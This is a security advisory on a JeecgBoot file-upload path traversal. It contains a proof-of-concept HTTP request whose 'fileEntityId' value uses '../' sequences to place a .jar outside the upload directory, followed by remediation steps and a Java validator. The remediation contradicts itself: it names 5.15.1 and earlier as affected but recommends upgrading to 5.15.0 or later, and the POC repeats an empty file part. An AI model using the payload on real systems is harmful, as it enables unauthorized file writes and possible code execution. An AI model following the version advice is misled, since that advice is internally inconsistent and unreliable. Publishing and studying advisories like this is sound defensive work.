# Vulnerability Summary: JeecgBoot File Upload Path Traversal Vulnerability

## Vulnerability Overview

In the `/a/file/upload` endpoint of JeecgBoot, the `fileEntityId` parameter is vulnerable to path traversal. Attackers can upload files to arbitrary directories on the server by crafting malicious parameters containing `../`.

## Affected Scope

- **Affected Versions**: JeecgBoot 5.15.1 and earlier
- **Exploitation Conditions**: Requires file upload permissions
- **Impact**: Remote Code Execution (RCE)

## Proof of Concept (POC)

```http
POST http://localhost:8080/jeecg-boot/a/file/upload HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Length: 1325
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.jar"
Content-Type: application/java-archive

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="fileEntityId"

../../../../../../../../../../tmp/test
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="test.jar"
Content-Type: application/java-archive

------WebKitFormBoundary7MA4YWxkTrZu0gW--
```

## Remediation

1. **Method 1**: Add parameter validation in `FileUploadController.java` to intercept illegal parameters containing `../` or `\`.
2. **Method 2**: Create a custom Service implementation class to validate `fileEntityId` before uploading.
3. **Method 3**: Upgrade to version 5.15.0 or later and repack the project.
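The following is an added example of the validation that Methods 1 and 2 describe; it is not JeecgBoot's own code. It assumes uploads live under one fixed base directory and that `fileEntityId` is used as a single sub-directory name, and the allow-list pattern and the `/var/jeecg/upload` path are illustrative assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/** Example helper (not JeecgBoot code) to validate fileEntityId before any write. */
public final class FileEntityIdValidator {

    private FileEntityIdValidator() {}

    /** Returns true only if the id is a plain single path segment. */
    public static boolean isSafeFileEntityId(String fileEntityId) {
        if (fileEntityId == null || fileEntityId.isEmpty()) {
            return false;
        }
        // Reject traversal sequences, both separator styles and NUL bytes outright.
        if (fileEntityId.contains("..") || fileEntityId.contains("/")
                || fileEntityId.contains("\\") || fileEntityId.indexOf('\0') >= 0) {
            return false;
        }
        // Allow-list of what an entity id looks like (assumed format, adjust to the real ids).
        return fileEntityId.matches("[A-Za-z0-9_-]{1,64}");
    }

    /**
     * Defence in depth: resolve the target directory and confirm it still lies
     * inside the base directory after normalization, even if the allow-list changes.
     */
    public static Path resolveUploadDir(Path baseDir, String fileEntityId) {
        if (!isSafeFileEntityId(fileEntityId)) {
            throw new IllegalArgumentException("illegal fileEntityId");
        }
        Path base = baseDir.toAbsolutePath().normalize();
        Path target = base.resolve(fileEntityId).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("fileEntityId escapes upload directory");
        }
        return target;
    }

    public static void main(String[] args) {
        Path base = Paths.get("/var/jeecg/upload"); // constructed example base directory
        // The traversal value from the advisory is rejected; a plain id resolves under base.
        System.out.println(isSafeFileEntityId("../../../../../../../../../../tmp/test"));
        System.out.println(resolveUploadDir(base, "order123"));
    }
}
```

Wire `resolveUploadDir` in before the controller or service builds the destination path, so the request is rejected before any file is written.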